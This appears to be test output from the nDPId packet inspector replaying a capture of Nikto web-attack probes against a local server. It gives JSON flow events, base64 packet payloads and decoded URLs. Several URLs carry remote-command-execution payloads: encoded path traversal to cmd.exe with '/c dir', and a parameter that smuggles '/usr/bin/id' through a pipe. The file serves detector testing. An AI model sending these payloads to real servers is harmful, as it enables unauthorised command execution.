+00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1576420277893,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1576420277893,"pkt":"AAAAAAAAAAAAAAAACABFAADvSZpAAEAG8mx\/AAABfwAAAcdqH5B\/BnDaXNCp24AYAED+4wAAAQEICp1m\/62dZv+tR0VUIC9jZ2ktYmluLy4uJTI1NWMuLiUyNTVjLi4lMjU1Y3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk1KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01108{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003295)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1576420277895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1576420277895,"pkt":"AAAAAAAAAAAAAAAACABFAADqfTRAAEAGvtd\/AAABfwAAAcdsH5BhnER0\/MAlIYAYAED+3gAAAQEICp1m\/6+dZv+vR0VUIC9paXNhZG1wd2QvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01103{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003296)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7560000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1576420277896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":258,"pkt_l4_len":224,"thread_ts_msec":1576420277896,"pkt":"AAAAAAAAAAAAAAAACABFAAD0gMpAAEAGuzd\/AAABfwAAAcduH5Bs5rmLXk\/vk4AYAED+6AAAAQEICp1m\/7CdZv+wR0VUIC9tc2FkYy8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7560000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003297)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7560000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_packet_id":1,"flow_last_seen":1576420277898,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1576420277898,"pkt":"AAAAAAAAAAAAAAAACABFAADwDYtAAEAGLnt\/AAABfwAAAcdwH5DXOjTMIaH3HYAYAED+5AAAAQEICp1m\/7GdZv+xR0VUIC9wYnNlcnZlci8uLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7560000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003298)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_packet_id":1,"flow_last_seen":1576420277899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277899,"pkt":"AAAAAAAAAAAAAAAACABFAADkYvBAAEAG2SF\/AAABfwAAAcdyH5AooFut2XrcJYAYAED+2AAAAQEICp1m\/7OdZv+zR0VUIC9ycGMvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01097{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003299)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7560000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_packet_id":1,"flow_last_seen":1576420277901,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1576420277901,"pkt":"AAAAAAAAAAAAAAAACABFAADogDVAAEAGu9h\/AAABfwAAAcd0H5COI7lxOfsaCoAYAED+3AAAAQEICp1m\/7WdZv+1R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7560000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003300)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7560000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_packet_id":1,"flow_last_seen":1576420277902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1576420277902,"pkt":"AAAAAAAAAAAAAAAACABFAADos7FAAEAGiFx\/AAABfwAAAcd2H5DBqortDeq7IYAYAED+3AAAAQEICp1m\/7adZv+2R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYyt2ZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7560000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+ver","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003301)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":1,"flow_last_seen":1576420277903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277903,"pkt":"AAAAAAAAAAAAAAAACABFAAEFC5dAAEAGMFp\/AAABfwAAAcd4H5DWdjLSA\/QqXoAYAED++QAAAQEICp1m\/7edZv+3R0VUIC9fdnRpX2Jpbi8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzMwMikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003302)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_packet_id":1,"flow_last_seen":1576420277905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420277905,"pkt":"AAAAAAAAAAAAAAAACABFAADdGS5AAEAGIut\/AAABfwAAAcd6H5B05SBpiRPNwoAYAED+0QAAAQEICp1m\/7mdZv+5R0VUIC9hbnMucGw\/cD0uLi8uLi8uLi8uLi8uLi91c3IvYmluL2lkfCZibGFoIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003370)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7560000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_packet_id":1,"flow_last_seen":1576420277907,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1576420277907,"pkt":"AAAAAAAAAAAAAAAACABFAADhaxBAAEAG0QR\/AAABfwAAAcd8H5CT4lJLpEBlJ4AYAED+1QAAAQEICp1m\/7udZv+7R0VUIC9hbnMvYW5zLnBsP3A9Li4vLi4vLi4vLi4vLi4vdXNyL2Jpbi9pZHwmYmxhaCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01098{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7560000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003371)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 